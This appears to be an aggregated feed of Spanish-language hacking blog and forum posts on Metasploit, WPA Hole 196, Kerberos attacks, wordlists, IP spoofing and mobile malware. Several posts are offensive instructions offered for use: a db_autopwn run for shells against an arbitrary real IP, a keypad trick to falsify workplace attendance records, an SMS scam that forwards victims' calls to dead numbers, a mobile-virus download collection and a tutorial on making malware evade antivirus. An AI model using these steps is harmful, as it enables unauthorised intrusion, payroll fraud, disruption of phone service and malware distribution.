Auto-Ataque con Metasploit Framework

Auto-Ataque con Metasploit Framework: "

Bueno alguno de ustedes puede que ya conozcan el framework de metasploit y para los que no conozcan esta tool, les explicare.

El framework de metasploit es una suite de exploits y de herramientas de seguridad informatica, es una suite perfecta para las pruebas de pentest y para intruccionarse en sistemas.

¿De donde podemos descargar Metasploit Framework?

[+] metasploit framework para widnows 2000 hasta windows seven version 3.4.1

[+] metasploit framework para linux version 3.4.1

Aqui mas informacion sobre la descarga de Metasploit Framework

Bueno vamos a comenzar !!!

Una vez instalado el framework en el equipo vamos a realizar una actualizacion al framework. Para realizar eso utilizaremos el comando msfupdate.

Una vez muestre la revision, significa que ya esta actualizado completamente.

Ahora entraremos en la consola de comandos del metasploit ejecutando msfconsole.

Una vez adentro vamos a activar el plugin de sqlite el cual nos permitira crear la base de datos para realizar un autoataque, asi que para hacer eso escribiremos: db_driver sqlite3

Listo.

Una vez cargado el driver vamos a crear una base de datos para que se guarde toda la informacion, para ello ejecutaremos: db_create hack1

hack1 lo pueden cambiar por cualquier otro nombre.

Creada la base de datos procedemos a realizar el scanneo con nmap y a guardarlo en la base de datos.

Para eso ejecutamos: db_nmap -sS -sV -PN 67.228.192.227

recuerden 67.228.192.227 se cambia por la ip que quieren scannear, esta ip es escogida al azar por google.

Bueno una vez scanneado el host, el resultado se guarda automaticamente en la base de datos creada anteriormente. Ahora vamos a coger los exploits de cada puerto y los vamos a probar todos.

Aunque eso no lo hacemos nosotros se hara automaticamente con la opcion db_autopwn y cuando salga la shell simplemente nos dara el acceso. Bonito cierto ??

Bueno para hacer eso ejecutaremos: db_autopwn -p -e -t -s -r -b

Usage: db_autopwn [options]

-h Display this help text

-t Show all matching exploit modules

-x Select modules based on vulnerability references

-p Select modules based on open ports

-e Launch exploits against all matched targets

-r Use a reverse connect shell

-b Use a bind shell on a random port (default)

-q Disable exploit module output

-R [rank] Only run modules with a minimal rank

-I [range] Only exploit hosts inside this range

-X [range] Always exclude hosts inside this range

-PI [range] Only exploit hosts with these ports open

-PX [range] Always exclude hosts with these ports open

-m [regex] Only run modules whose name matches the regex

Ya con esto solo nos queda esperar la shell. Facilito cierto ??

Gracias a los de metasploit por esta gran tool y espero les guste el tuto.

Foro de discusion: Autoatack – Metasploit

Pagina principal de Metasploit Framework: Metasploit Framework

"

Como conocí a tu chica & Hole 196

Como conocí a tu chica & Hole 196: "

En BlackHat/Defcon siempre hay sesiones curiosas que uno se pierde, pero que, gracias a los que escriben sobre ellas, uno puede volver a asitir varias veces a los eventos.

Aprovechando las referencias que ha habido en la web, y que Dragonjar ha recopilado todas las presentaciones y whitepapers, he repasado una muy curiosa titulada How I met your girlfriend. [white paper, slides]

La idea de la charla es analizar las debilidades en la generación de números aleatorios de sesión en PHP 5.3 y ver como estos adolecen de debilidades que pueden permitir a un atacante predecirlos. Sin embargo, la gracia total de la charla y lo que más ha dado la vuelta al mundo ha sido la aplicación de la prueba de concepto para extraer la MAC del router y pasarla por la base de datos de MAC y posiciones GPS creadas por el cochecito del Google Street View para decirte donde vives.


Figura 1: MACXSS POC
Samy Kamkar ha puesto una prueba de concepto de esto online, que puedes probar. Desde Internet Explorer 8 no tira, pero si le das a alguno de los otros Web Browsers podrás verlo. La idea es muy chula.

WPA Too

La segunda charla de la que quiero hablaros es de la famosa Hole 196 de la WiFi. Tras un poco de lío con las informaciones previas, la idea del ataque es tan sencilla como peculiar.

En la página 196 del estándar dice que los mensajes enviados con claves de grupo, es decir, las claves pensadas para comunicaciones broadcast no tienen protección contra Spoofing. Así, un atacante puede enviar un mensaje con una clave GTK con la IP que quiera.


Figura 2: Distribució de claves en WPA/WPA2
La gracia del ataque es enviar un mensaje con una clave GTK pero a una MAC dirigida en lugar de a una dirección MAC de broadcasting. Haciendo esto, sólo la víctima procesará ese paquete broadcast y, por tanto, salvo que la tabla de ARPs tenga la resolución de la MAC del Gateway estática, se producirá una envenenamiento de la IP que permitirá suplantar al router.

A partir de ese momento, cuando la víctima se comunique con el Gateway se utilizarán las claves PTK asociadas a esa IP, que el atacante amáblemente entregará para hacer el MITM. Simple, pero funcional.

No rompe el sistema de autenticación de WPA/WPA-2 Enterprise, pero ayuda a hacer ataques MITM en esos entornos de forma oculta. La gracia es que el paquete va cifrado con la GTK y a una MAC que no es de broadcast lo que haría que, hasta que no aparezcan soluciones IDS que inspeccionen todo el tráfico que vaya cifrado con claves GTK aunque no vaya a MAC de broadcast, el ataque no sea descubierto. Tienes el paper en la siguiente URL: WPA Too Hole 196 white paper y todos los materiales de la Defcon18 publicados aquí.

Ale, para que luego digas que no viniste a las charlas ;)

Saludos Malignos!

http://elladodelmal.blogspot.com

"

Discurso de Steve Jobs en Stanford

Discurso de Steve Jobs en Stanford: "

Tiene ya cierto tiempo, y no es el lado del mal un lugar habitual donde encontrar cosas de Apple o Steve Jobs, pero este discurso que dio hace más de un año es muy chulo. Además, como está subtitulado al español lo podréis disfrutar todos. ¡Feliz Sábado!


Saludos Malignos!

http://elladodelmal.blogspot.com

"

SeguridadApple.com un blog más en casa

SeguridadApple.com un blog más en casa: "

Cuando uno se hace mayor, al final le comen por las patas. Ese es el resumen de lo que me hacen los descarriados del SOCtano: Darme caña y comerme por las patas. Así, cuando llego a la oficina me encuentro a estos que usan Firefox, los que enredan con el Chrome - espero que para seguir rompiéndolo - los que tienen el Ubuntu en su portátil y los de la dichosa manzana.

Aunque muchos se puedan pensar que yo me como a todo el que no utiliza Windows 7 - lo siento por ellos - al contrario cada uno puede hacer lo que le plazca en el SOCtano. Está para eso, para enredar y trabajar con lo que quieras.

Así, tras una charla hace un par de meses, en el SOCtano se decidió dedicar tiempo y recursos a la seguridad en los sistemas Apple, pues ya nos había tocado realizar algún análisis forense o integrarlos en el Directorio Activo o en el sistema de publicación segura a través de VPN-SSL con Forefront UAG. Y como no, al final, los más radicales han abierto un blog llamado SeguridadApple.com.

Este blog aun está en pañales, pues se está configurando aún la plantilla del blog y arreglando detalles, pero, como ya se han empezado a publicar posts en él, he pensado que para aquellos que leéis los blogs como yo, por medio de RSS, la estética os la iba a traer un poco al pairo.

A parte de este blog, desde I64 mantenemos varios sitios más, como muchos ya sabréis. En suma, todos los blogs son:

- SeguridadApple.com: Dedicado a tecnologías Apple.
- WindowsTecnico.com: Dedicado a tecnologías y herramientas para sistemas Windows.
- Seguros con Forefront: Todo sobre Forefront en español.
- PuntoCompartido: Escrito por Rubén, MVP de SharePoint.
- ExchangeSpain: Escrito por Joshua Saénz, MVP de Exchange.
- Legalidad Informática: Lo lleva Juan Luís G. Rambla, MVP de Seguridad.
- El blog de Thor: Escrito por Francisco Oca.
- WindowsTips: Del inclito Juan Garrido 'Silverhack'.
- El SOCtano: De los chicos de auditoría.

Vamos, que te puedes aburrir leyendo este verano.

Saludos Malignos!

http://elladodelmal.blogspot.com

"

Pass the Ticket: Kerberos authentication bypass POC

Pass the Ticket: Kerberos authentication bypass POC: "

Las técnicas Man-In-The-Middle se están convirtiendo en las estrellas de este mundo hiper-mega-conectado. En este caso, la técnica Mitm se utiliza para realizar ataques a Kerberos en entornos de dominio Windows.

Kerberos es el mecanismo de autenticación y autorización utilizado en los dominios Micrososft Windows y se acaba de publicar un paper, con una prueba de concepto funcional, que demuestra como es posible realizar ataques MitM para acceder a recursos por parte de usuarios no autenticados.

En el 2008 Emmanuel Bouillón había alertado de la posibilidad de enlazar ataques de spoofing al KDC (Key Distribution Center), unidos a un ataque de Replay en un entorno de Man In The Middle para hacer esto.

La conferencia, bajo el título de 'Gaining access through Kerberos' se presentó en la PacSec 2008. En BlackHat Europe de 2009 amplió el trabajo y presentó un paper en el que especificaba más todas las fases necesarias para implementar dicho ataque: 'Taming the beast : Assess Kerberos-protected networks'

Ahora, desde Venezia, Italia, Tommaso Malgherini, como trabajo de su Thesis Doctoral 'Pass The Ticket', ha realizado una implementación completa del ataque y ha sacado unas herramientas que permiten realizar un bypass de la autenticación en una red con Kerberos en cualquiera de sus versiones. En sus pruebas, se ha puesto en contacto con Microsoft que ha confirmado que solucionará este problema en el próximo service pack de los productos.

Las herramientas pueden ser descargadas desde la página del proyecto en http://secgroup.ext.dsi.unive.it/kerberos/. Estas herramientas y este ataque ha demostrado funcionar en entornos de Kerberos sobre Windows y no sobre Linux.

¿Y cómo arreglas esto si tienes un dominio Windows?

Este no es el primer ataque al protocolo kerberos que sufren las plataformas Microsoft Windows. De hecho, la popular herramienta Cain lleva un módulo para hacer romper las claves de los usuarios cuando se autentican por Kerberos en un entorno de Man In The Middle.

La solución que propone Microsoft, desde hace años, es utilizar IPSec en las máquinas del dominio. Si tienes instalado un Dominio Microsoft puedes utilizar IPSec en varias formas.

La más sencilla es utilizar IPSec sólo para cifrar y autenticar el tráfico Kerberos. De esta forma todo el tráfico que implique autorización y/o autenticación kerberos ira protegido contra ataques Man In The Middle.

Si quieres evitar cualquier tipo de ataque Man In The Middle en tu red, puedes utilizar IPsec para todos los protocolos. Aquí tienes un webcasts para usar IPSec para autenticar Kerberos en Windows Server 2003. Aquí tienes una guía sobre como aislar los dominios Windows 2008 escrito por nuestro compañero 'Silverhack' y coomo evitar ataques MitM con IPSec y en Windows Técnico tienes como implantar IPSec punto a punto a través del Firewall avanzado.

Saludos Malignos!

http://elladodelmal.blogspot.com

"

RSMangler – Multiplica tus diccionarios para hacer BruteForce

RSMangler – Multiplica tus diccionarios para hacer BruteForce: "

Si para ti no es suficiente el Listado de Diccionarios para Realizar Ataques de Fuerza Bruta que publicamos hace poco o quieres realizar tu propio diccionario basandote en algunas palabras claves especificas, RSMangler es para ti.

RSMangler es un script desarrollado en Ruby por la compañía de seguridad RandomStorm (los mismos creadores del DVWA – Damn Vulnerable Web App), que tomando como base una lista de palabras y realizando sobre cada una varias manipulaciones logra obtener un diccionario mucho mas completo que el original, para utilizarlo en nuestras herramientas.

Supongamos que estamos realizando un pentest a una pagina web y queremos entrar a su servidor FTP por medio de fuerza bruta (usando los diccionarios que ya hemos publicado), después de mucho tiempo, nuestra herramienta termina de probar todas las combinaciones, pero no da con la clave… ¿que hacemos?, ¿un ataque de fuerza bruta puro (a aa aaa ….)?. NO.

Afortunadamente nos acordamos de dos herramientas publicadas en la pagina de La Comunidad DragonJAR, la primera llamada CeWL, nos permite generar un listado de contraseñas basado en las palabras que encuentra dentro de una pagina web y la segunda RSMangler que toma este diccionario generado y le aumenta aun mas su poder combinando cada palabra a nuestro gusto.

El resultado es que logramos acceder al FTP de la pagina que auditábamos, la cual escribía sobre mascotas y su clave era “PeRrOs123GatoS“….

Para hacernos a una idea de los resultados que obtendremos al generar con RSMangler todas las posibles combinaciones de nuestros diccionarios, hagamos la prueba con 3 palabras, corremos RSMangler sobre ellas (con todas las posibles modificaciones) y obtendremos 4245 palabras, si las palabras son 5, el resultado serán 91975 palabras, por esta razón este script no puede faltar en tu caja de herramientas, ya que permite multiplicar en cualquier momento tu lista de diccionarios para utilizarlos en un ataque de fuerza bruta.

También puede interesarte...

• Listado de Diccionarios para Realizar Ataques de Fuerza Bruta
• Robando claves por XSS del Administrador de Contraseñas del Firefox
• Memorias del VI OWASP Spain Chapter Meeting
• Resetear Password de Root
• Como Recuperar Clave MySQL
• CeWL – Generador de Diccionarios Personalizados
• Nueva versión de Cain & Abel
• Cambiar Password de Switch CISCO

"

AntiFrost 1.2

AntiFrost 1.2: "Destripador para el Bifrost

DESCARGAR

"

Burlar Checadores de la CFE (asistencia)

Burlar Checadores de la CFE (asistencia): "Bueno este post se realiza con fines educativos , empleados que manejen este tipo de checadores (CFE , Algunas dependencias de gobierno como SEMARNAT Y PROFEPA) favor limitarse a la aventura y si no es asi mucho cuidado //puedes perder tu empleo//

Los checadores varian segun la entida
Por netroyano Votos: 1"

Bueno este post se realiza con fines educativos , empleados que manejen este tipo de checadores (CFE , Algunas dependencias de gobierno como SEMARNAT Y PROFEPA) favor limitarse a la aventura y si no es asi mucho cuidado //puedes perder tu empleo//

Los checadores varian segun la entidad pero he confirmado que estos son los usados en Tamaulipas , Veracruz y Tabasco.

Anexo Imagen
http://img814.imageshack.us/i/ceridiano.png/

Los dia de corte son los dias 13 y 28 asi que se aconseja realizar el test un dia antes del corte de nomina.

Imaginemos que faltamos el dia 9 (1,2,3,4,5,6,7,8,x,11,12,13,14,15) pero nos encontramos en dia el dia 10 y queremos colocar la asistencia.
================================================
Modo: Ingresar Pin cuando marce en el display el OK
dejar oprimido la tecla M inmediatamente cuando cambie el display manteniendo presionado la tecla M marcar 0 (CERO)
cuando coloque el mensaje RESUMEN (ESCRIBE EL DIA QUE FALTASTES EN ESTE CASO PRESIONA EL BOTON 9)
cuando te pregunte BACKUP Y/N colocamos Y

emularemos las instruccion del supervisor de RH
y cuando este descargue las asistencias y retardos a su software complemento tendremos sueldo seguro.

muchas empresas usan el modelo timework sta200 si tienes suerte hasta en tu trabajo podria estar uno de estos checadores.

Tutorial hecho por N3troyano

Saludos Megabyte&Xzite

Un Ataque Que Podria Dejar Sin Telefonia Movil A Toda una Ciudad....

Un Ataque Que Podria Dejar Sin Telefonia Movil A Toda una Ciudad....: "Un Ataque Que Podria Dejar Sin Telefonia Movil A Toda una Ciudad....


Por MAZTOR Votos: 5"

Un Ataque Que Podria Dejar Sin Telefonia Movil A Toda una Ciudad....



Pues En mi Rato Libre Me puse a Realizar una Investigacion en celulares Analogicos y Modernos.... Probando con Cmands Sticks Me Acorde De algo!

Se Acuerdan De los 3 Famosos Codes!!!

**21*numerodestinatario# [SEND]
*##21# [SEND]

Si nos e acuerdan.. estos son DESVIOS DE LLAMADAS



Pero Se preguntaran Porque esta Huevada Se esta Posteando Es mas Viejo Que mis Cojones XD¿?

Aqui va la Respuesta...

Que tal Si Coges un SPAMMER CEL y Haces Los Siguiente..

|--------------------------------------------------------|
| Cel: 301-xxx-xxxx
|      301-xxx-xxxx
|      301-xxx-xxxx
|      301-xxx-xxxx
|      301-xxx-xxxx
|   Con Mas numeros..
|
|Mensaje: Su Operador le nforma que hay una Actualizacion
|Para Solicitarla Oprima lo Siguiente: **21*3001234567#  seguido
| de
|la tecla Send....
----------------------------------------------------------

NOTA: **21*3001234567# Donde se encuentra el Numero 10 deberia ir un Desvio con Numero Activo pero si este esta OFF o No existe Crearia un Error De llamada o Numero Errado

Que Pasaria¿?

Lo Intente con 5 Numeros Familiares.. y con los Cels a la mano..
al Momento de llamarles, Este No Permitian llamadas entrantes..

GRABACION: NUMERO ERRADO!



Aja y Eso que.. Como Podria Joder a Toda una Ciudad.. Que Tonteria!¿?

Las Bases Con los Numeros Celulares de Ciertos Operadores.. las consigues Por hay... Yo tengo 3 bases... y s evenden a Buen Precio..

1 Base Tiene Aprox 2 Millones de numeros Que Al Crear un Spammer cel con soporte de cierta cantidad, Se podria Saturar Miles y Miles de Lineas Moviles...



Poniendolo A Prueba!

1- Conecte mi cel y Transferi Los Directrios y Grupos Telefonicos a un TXT

2- Cogi el Spammer de un Amigo.. y Enviamos el mensaje a 50 Numeros

3- Al Intentar llamar a alguno de estos

GRABACION: NUMERO ERRADO!


Al testear un rato mas Me doy cuenta.. Que en Todos Los Modelos No sirve este!!

Solo Algunos De ellos!!!

Por eso No es un 100 % CMPROBADO! ya que no tengo Miles de Celulares XD!


CONCLUSION: Un Operador Movil Podria Quebrar o Decaer Con Este Fallo En Ciertos Celulares Incluso!.. La dificil SOLUCION ya que la manera de Arreglar Seria Enviando un MENSAJE con el Disacdo Que lo soluciona...

SOLUCION DEL FALLO:

##21# [SEND]

Pocas Palabras...

Este Tipo de Ataques Puede Ser fatal para los Usuarios con celulares Algo Antiguos Incluso Celulares nuevos que admiten la Reprogramacion De Sticks o KeyTicks... Esto Podria Afectar Demasiado a los Locales de Llamadas.. Que Usan Generalmente este tipo de Celulares... GENRARIA UNA GRAN DECAIDA DE $$$...

Suplantacion de IP

Suplantacion de IP: "

Suplantación de dirección IP

'La 'suplantación de dirección IP' es una técnica que consiste en reemplazar la dirección IP de un paquete IP del remitente por la dirección IP de otro equipo.

Esta técnica le permite al pirata enviar paquetes de manera anónima. No se trata de cambiar la dirección IP, sino de suplantar la dirección IP al enviar los paquetes.

Algunas personas se inclinan a incorporar el uso de un proxy (que posibilita ocultar la dirección IP) con suplantación de IP. Sin embargo, los proxys sólo envían paquetes. Por lo tanto, aunque la dirección aparentemente está oculta, se puede encontrar a un pirata fácilmente gracias al archivo de registro del proxy.

Ataque de suplantación

La técnica de suplantación de dirección IP permite que un pirata envíe paquetes a una red sin que el sistema de filtrado de paquetes (firewall) los intercepte.

Los sistemas firewall a menudo se basan en reglas de filtrado que indican las direcciones IP autorizadas a comunicarse con la red de los equipos internos.

Un paquete cuya dirección IP se ha suplantado por la de un equipo interno parecerá provenir de la red interna y se transferirá al equipo de destino, mientras que un paquete con una dirección IP externa será rechazado automáticamente por el firewall.

Sin embargo, el protocolo TCP (protocolo que básicamente garantiza la transferencia fiable de datos a través de Internet) se basa en relaciones de autenticación y confianza entre la red de los equipos. Esto significa que para aceptar el paquete, el receptor debe acusar recibo del remitente y éste tiene que acusar recibo de la confirmación.

Modificación del encabezado TCP

La información circula por Internet gracias al protocolo IP, que garantiza la encapsulación de datos en estructuras llamadas paquetes (o más precisamente datagramas IP). Así es la estructura de un datagrama:

La suplantación de una dirección IP implica modificar el campo origen para simular un datagrama que proviene de otra dirección IP. Pero los paquetes en Internet se envían, por lo general, a través del protocolo TCP, lo que garantiza una transmisión 'fiable'.

Antes de aceptar un paquete, el equipo primero debe acusar recibo del paquete enviado por el equipo remitente y esperar que éste acuse recibo de la confirmación.

Relaciones de confianza

El protocolo TCP es uno de los protocolos principales del nivel de transporte de los modelos TCP/IP. En el nivel de aplicación, permite administrar datos que provienen del (o van al) nivel más bajo del modelo (es decir, el protocolo IP).

Aunque use el protocolo IP (que no verifica el envío de datagramas), el protocolo TCP permite la transferencia de datos fiable gracias al sistema de acuse de recibo (ACK) que permite que el cliente y el servidor se aseguren de que se hayan recibido los datos en ambos lados.

Los datagramas IP agrupan paquetes TCP (llamados segmentos) que se estructuran así:

Al enviar un segmento, éste se asocia a un número de secuencia y el intercambio de segmentos que contienen campos especiales (llamados indicadores) posibilita sincronizar al cliente y al servidor.
Este diálogo (que se llama negociación de tres vías) permite iniciar la comunicación que se divide en tres fases, como su nombre lo sugiere:

• Primero, el equipo remitente (el cliente) envía un segmento cuyo indicador SYN está en 1 (para demostrar que es un segmento de sincronización) con un número de secuencia N, que se llama el número de secuencia inicial del cliente.
• En segundo lugar, el equipo receptor (el servidor) recibe el segmento inicial del cliente y luego envía un acuse de recibo, es decir, un segmento cuyo indicador ACK no sea nulo (acuse de recibo) y cuyo SYN esté en 1 (ya que aun es una sincronización). Este segmento contiene un número de secuencia que es igual al número de secuencia inicial del cliente. El campo más importante en este segmento es el de acuse de recibo (ACK) que contiene el número de secuencia inicial del cliente incrementado en 1.
• Por último, el cliente envía al servidor un acuse de recibo, que es un segmento cuyo indicador ACK no es nulo y cuyo indicador SYN está en cero (ya no es más un segmento de sincronización). Su número de secuencia está incrementado y el acuse de recibo representa el número de secuencia inicial del servidor incrementado en 1.

. El equipo con IP suplantada responderá con un paquete TCP cuyo indicador RST (restablecimiento) no será nulo, lo que concluirá la conexión.

Destrucción del equipo con IP suplantada

Al llevar a cabo un ataque de suplantación de una dirección IP, el atacante no recibe información a cambio porque las respuestas del equipo de destino son direccionadas a la red de otro equipo (esto se conoce como ataque a ciegas).

Además, no deja al atacante intentar una conexión ya que sistemáticamente envía un indicador de RST al equipo de destino. Por consiguiente, el trabajo del pirata consiste en invalidar el equipo con IP suplantada al hacerlo inaccesible durante todo el ataque.

Predicción de números de secuencia

Una vez que el equipo con IP suplantada se ha invalidado, el equipo de destino espera el paquete que contiene el acuse de recibo y el número de secuencia correcto. Lo que el pirata debe hacer es 'adivinar' el número de secuencia a devolver al servidor y así establecer la relación de confianza.

Para logarlo, los piratas usan, en general, el enrutamiento de origen, es decir, usan el campo opción en el encabezado IP para indicarle al paquete una ruta de retorno específica. Por lo tanto, gracias al rastreador de puertos, el pirata podrá leer el contenido de los paquetes de retorno.

Basta saber el último número de secuencia enviado para que el pirata trace las estadísticas sobre su incrementación y envíe acuse de recibo hasta obtener el número de secuencia correcto.

Fuente: http://es.kioskea.net/contents/attaques/usurpation-ip-spoofing.php3

"

Virus y Antivirus para Celulares

Virus y Antivirus para Celulares: "

VIRUS PARA CELULARES

Unicos en la red. la coleccion mas grande de virus para celulares de la red.

Contenido:
CommWarrior: Todas las versiones (8 en total)
Cabir: Todas las Versiones (19 en total)
Doombot: 4 versiones
Skudo: 2 versiones
Skull: Todas las versiones (14 en total)
Otros: varios virus desconocidos hasta para mi mas el agregado del Source code de algunos

DESCARGAR VIRUS

--Descripción de los virus--

.......::::::cabir:::::::......

tipo: virus-gusano
so : Symbian


Cabir es, concretamente, un gusano que utiliza las señales bluetooth, y ya se ha expandido por 20 países. Reduce drásticamente la potencia de los teléfonos infectados, y las variantes más dañinas pueden desactivar el terminal, que debe ser reiniciado en un establecimiento especializado.

Cabir se propaga en forma de un archivo llamado Caribe.sis, que se instala automáticamente en el sistema cuando el usuario acepta la transmisión,El virus vuelve a ejecutarse desde otra ubicación, y el teléfono es reiniciado. Igualmente, el virus se ejecutará cuando el teléfono sea encendido, y seguirá activo a pesar de que sea borrado del directorio APPS.

*DESINFECCION:

Para remover el gusano de un equipo infectado, se deberá instalar un administrador de archivos y habilitar la opción para ver archivos en el directorio de sistema.

Luego, buscar en unidades de la A: a la Y: directorios de nombre \System\Apps\Caribe. Una vez encontrado deben ser eliminados los siguientes archivos:

Caribe.App
Caribe.Rsc
Flo.Mdl

Buscar también el directorio \System\Symbiansecuredata\Caribesecuritymanager y eliminar allí los archivos:

Caribe.App
Caribe.Rsc
Caribe.Sis

Bajo el directorio \System\Recogs eliminar el archivo Flo.Mdl.

Dado que el archivo Caribe.Rsc no puede ser eliminado mientras se esté ejecutando, se deberán eliminar todos los otros archivos, luego reiniciar el equipo y por último eliminar dicho archivo.

Finalmente, eliminar el archivo Caribe.Sis del directorio \System\Installs.

....::::::Commwarrior::::::.....

tipo: virus-gusano
so : Symbian



Este gusano poseé las mismas caracteristicas que el cabir pero puede reproducirse por
SMS, MMS, MMS y mandar datos como texto, videos, imagenes etc.
Es el primer gusano con esta capacidad

En algunos modelos de teléfonos, el gusano cambia el logo de la operadora telefónica, por uno propio con el siguiente texto:

Infected by Commwarrior

El gusano tambien puede abrir una página Web con el navegador del celular

modelos afectados:


----Symbian OS Series 60----

Nokia 3650, 3600
Nokia 3660, 3620
Nokia 6600
Nokia 6620
Nokia 7610
Nokia 7650
Nokia N-Gage
Panasonic X700
Sendo X
Siemens SX1

*DESINFECCION:

Eliminación manual

Para eliminar el gusano de un dispositivo infectado, sigue estos pasos:

1. Selecciona la opción 'CommWarrior' de la lista de aplicaciones.

2. Selecciona 'Cancel' (Exit CommWarrior?) y confirma con 'Yes'.

3. Borra la carpeta 'CommWarrior' utilizando el manejador de archivos (file manager):

C:\system\apps\CommWarrior\


Aunque el sistema por defecto se instala en la unidad C, esto puede cambiar en algunos casos.

Si no puedes borrar estos archivos, apaga y vuelva a encender tu dispositivo.

.....::::::Doomboot::::::.....

tipo: troyano
so : Symbian


Doomboot es un troyano que al ejecutarlo automaticamente se descarga el gusano Commwarrior
Doomboot provoca que los teléfonos no se reinicien como debe. Esta diversidad de efectos virales dañan a los usuarios de smartphones de la serie 60 de Symbian, especialmente a los usuarios que utilizan juegos piratas.

Doomboot provoca que el teléfono no pueda reiniciar y Commwarrior provoca tráfico Bluetooth que hace que el teléfono se quede sin bateria en menos de una hora. Si alguien se infecta de Doomboot tiene menos de una hora para darse cuenta y desinfetcarse, de lo contrario perderá todos sus datos

Doomboot puede distribuirse de dos formas, por mensajes MMS y por menajes Bluetooth


*DESINFECCION:

1. Elimina los siguientes ficheros que localizarás en las ubicaciones indicadas:

* C:\Etel.dll
* C:\etelmm.dll
* C:\etelpckt.dll
* C:\etelsat.dll
* C:\system\apps\Cabir AA detected\Cabir AA detected EVS is disinfecting re-boot your phone.rsc - 0 bytes
* C:\system\apps\Cabir AA detected\Cabir AA detected EVS is disinfecting re-boot your phone.MBM - 0 bytes
* C:\system\apps\Cabir AA detected\Cabir AA detected EVS is disinfecting re-boot your phone.app - 0 bytes
* C:\system\apps\Cabir AA detected\Cabir AA detected EVS is disinfecting re-boot your phone.app - 0 bytes
* C:\system\apps\EVS\EVS.aif - 3,245 bytes
* C:\system\apps\EVS\EVS.app - 30,368 bytes
* C:\system\apps\EVS\EVS.rsc - 671 bytes
* C:\system\apps\EVS\EVS_caption.rsc - 60 bytes
* C:\system\apps\EVS\exovirusstop.mbm - 3,961 bytes
* C:\system\apps\velasco\marcos.mdl - 0 bytes
* C:\system\apps\velasco\velasco.app - 0 bytes
* C:\system\apps\velasco\velasco.rsc - 0 bytes

2. Reinicia tu terminal y explora todo la unidad C: con un antivirus para asegurarte de la eliminación del troyano.

.....::::::skudoo::::::.....

tipo: troyano
so : Symbian



Askudoo fecta a dispositivos móviles y opera sobre dispositivos con plataforma Windows CE, J2ME, Symbian, iPhone, Blackberry o Android. Puede ser recibido a través de MMS, vía Bluetooth o descargado a través de páginas web.

es un troyano diseñado para dispositivos móviles, que llegando bajo una apariencia inofensiva, permite en realidad llevar a cabo intrusiones y ataques contra el mismo.

Skudoo no se propaga automáticamente por sus propios medios, pero puede ser recibido a través de mensajes MMS, Bluetooth o ser descargado desde sitios web con contenido malicioso.

.....::::::skulls::::::.....

tipo: troyano
so : Symbian

skulls es un troyano que se camuflagea con el nombre Extended Theme Manager,
induce al usuario a creer que al ejecutarlo podrá crear sus propios temas en su teléfono móvil. Sin embargo, Skulls cambia todos los íconos del teléfono con imágenes de calaveras.

Asimismo, las aplicaciones instaladas en el teléfono no pueden ser usadas una vez que Skulls se ha ejecutado.
Skulls se ha propagado mediante sitios de shareware para teléfonos Symbian.


*DESINFECCION:

Para remover el gusano de un equipo infectado, se deberá instalar un administrador de archivos y habilitar la opción para ver archivos en el directorio de sistema.



1. Ir a c:\System\apps\appinst y borrar
c:\System\apps\appinst
c:\System\apps\menu
c:\System\apps\mce
2. Abre el menú de aplicaciones
3. Busca navegador web
4. Descargar F-Secure Mobile Anti-Virus para su dispositivo
http://www.f-secure.com/wireless/download/
o con el propio móvil: http://mobile.f-secure.com
5. Instale F-Secure Mobile Anti-Virus
6. Inicie F-Secure móvil Anti-Virus
7. Analice su dispositivo para eliminar los archivos que se usan para bloquear el sistema de aplicaciones críticas
8. Ir al gestor de aplicaciones
9. Desinstalar 'Extended Theme.sis'

ANTIVIRUS PARA CELULARES

Simworks Antivirus 1.2.4
NetQin v2.0
Anti CommWarrior v1.0
Kaspersky Antivirus Mobile v2.0.45 Beta2
McAfee Virus Scan v1.11
Symantec Mobile Threats Removal Tool v 1.05
Symantec Mobile Security 4.0
Trend Micro Mobile Security

DESCARGAR ANTIVIRUS

"

¿Qué son y cómo funcionan los troyanos bancarios?

¿Qué son y cómo funcionan los troyanos bancarios?: "

En este documento nos comentan cómo se han depurado las técnicas de captura de usuarios y contraseñas y las de monitorización. Pequeños trucos en los que por ejemplo, avisan que observar la presencia del candado de seguridad en la página de la entidad bancaria y comprobar la autenticidad del certificado de seguridad son insuficientes

La lectura es recomendable para cualquier usuario de Internet, con el que aprenderá las técnicas que emplean los troyanos para monitorizar las visitas a páginas bancarias o cuáles son los métodos utilizados para el robo de sus credenciales, entre ellos:

* Registro de teclas pulsadas
* Captura de formularios
* Capturas de pantalla y grabación de vídeo
* Inyección de campos de formulario fraudulentos
* Inyección de páginas fraudulentas
* Redirección de páginas bancarias
* Man-in-the-middle

Además podremos ver qué sucede con los datos robados y cómo se materializa finalmente el robo.

En definitiva un documento muy interesante para aquellos que no estén familiarizados con este tipo de troyanos y deseen conocerlos un poco más.

Descargar Documento

"

[Tutorial] Como indetectar cualquier malware por codigo

[Tutorial] Como indetectar cualquier malware por codigo: "

Dedicacion:

Antes de comenzar con el tutorial dare gracias a dos webs que en verdad me han servido de mucho en principal a 'Indetectables' que con ella me introduje al mundo del malware y verme motivado porque muchos de los usuarios publican sus propias herramientas….. la otra web es 'hackhound' que aunque no este activo en esa web agradesco mucho a los usuario que ahi es donde aprendo mas leyendo cada post que hacen

Conocimientos Minimos:

Pues antes que nada para poder entenderme bien tendras que tener por lo menos conocimientos de como usar vb6 y entender que es una variable y todo eso que deberias aprender antes de meterte a la programacion en vb6 x]!….

Introduccion al tuto:

Como veo que muchos en Indetectables se dedican a codear y en parte para dejarlos FUD los Modean pero estoy seguro que hay personas como yo que no les gusta Modear por el tiempo que uno hace escaneando con cada antivirus y moviendo de maquinas virtuales …. En fin mi objectivo es que no solo existe esa manera de dejarlo FUD sino que tambien por codigo y a mi parecer la mas facil y rapida ya que moviendo unos cuantos codigos o cambiandolos de nombre podemos sakar muchos Avs ya que varios comparten las mismas firmas de esta manera podrias ahorrarte tiempo ; ) .. I hope u got my point hehe..



Entramos a la guerra:



Ahora si comenzare con el tutorial explicando cada parte y todos los metodos que se para dejar FUD nuestro Stub o cualquiera aplicacion que deseen ;) …….


Encriptando Strings:

Esto es lo mas fundamental de todo el codigo pues ay muchos strings que llevan como texto WINDOWS, System32, textos del registro como HKCU, HKLM y otros …

Hay muchas maneras de encriptarlas les mostrare las que me acuerdo ahora

Ejemplo de string



La parte '.exe' jala algunas firmas y por eso tenemos que enciptarla y podemos ponerla de las siguientes maneras



[1] En este usamos un String Reverse
[2] En este convertimos a Ascii el texto '.exe' :D
[3] Un ejemplo de como usarlo con alguna encriptacion de las cuales hay muchas o alguna propia que tengan

Con todo esto vemos que tan solo moviendo un poco y usando alternativas para algo que sera igual sacaremos firmas :D...



Cambiando Variables:

